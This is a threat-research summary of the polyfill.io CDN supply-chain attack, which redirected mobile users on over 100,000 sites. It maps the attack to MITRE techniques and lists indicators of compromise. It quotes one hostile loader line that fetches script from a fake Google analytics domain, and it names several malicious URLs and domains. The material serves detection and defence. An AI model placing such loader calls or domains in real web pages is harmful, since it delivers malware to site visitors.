Threat Research

Polyfill supply chain attack hits 100K+ sites

Securonix

Researchers uncovered a supply chain-style attack that abused the polyfill.io CDN to deliver malware to mobile users across 100K+ sites. The operation involved domain purchases, dynamic JavaScript payloads, and anti-analysis techniques, prompting advisories to remove polyfill references and consider alternatives from Fastly or Cloudflare. #PolyfillIO #GoogieAnalytics #JSTOR #Intuit #WorldEconomicForum #bootcdn #staticfile #newcrbpc

Keypoints

  • The polyfill.js library is widely embedded via cdn.polyfill.io on over 100,000 sites, including JSTOR, Intuit, and the World Economic Forum.
  • In February, a Chinese company bought the domain and its GitHub account, and the domain began injecting malware into mobile devices through sites embedding cdn.polyfill.io.
  • The malicious payload redirects mobile users to a sports-betting site using a fake Google analytics domain (www.googie-anaiytics.com).
  • The polyfill code is dynamically generated based on HTTP headers, enabling multiple attack vectors and evasion techniques.
  • The malware includes protections against reverse engineering, activates only on certain mobile devices at specific hours, and delays execution when a web analytics service is detected.
  • Cloudflare and Namecheap took action to block or hold the domain; Google began blocking Google Ads for eCommerce sites using polyfill.io; advisories recommend removing polyfill references and using trusted alternatives.

MITRE Techniques

  • [T1195] Supply Chain – The attacker abused a legitimate CDN domain (cdn.polyfill.io) by buying the domain and injecting malware into mobile users via sites that embed it. β€œIn February this year, a Chinese company bought the domain and the Github account. Since then, this domain was caught injecting malware on mobile devices via any site that embeds cdn.polyfill.io.”
  • [T1105] Ingress Tool Transfer – The malware loads external JavaScript resources to deliver its payload and perform redirection. β€œloadJS( β€˜https://www.googie-anaiytics.com/html/checkcachehw.js’ … )”
  • [T1027] Obfuscated/Compressed Files and Information – The code includes specific protections against reverse engineering and delays execution to evade analysis. β€œThe code has specific protection against reverse engineering, and only activates on specific mobile devices at specific hours. It also delays execution when a web analytics service is found, presumably to not end up in the stats.”

Indicators of Compromise

  • [URL] context – https://kuurza.com/redirect?from=bitget, https://www.googie-anaiytics.com/html/checkcachehw.js
  • [Domain] context – bootcdn.net, staticfile.net

Read more: https://sansec.io/research/polyfill-supply-chain-attack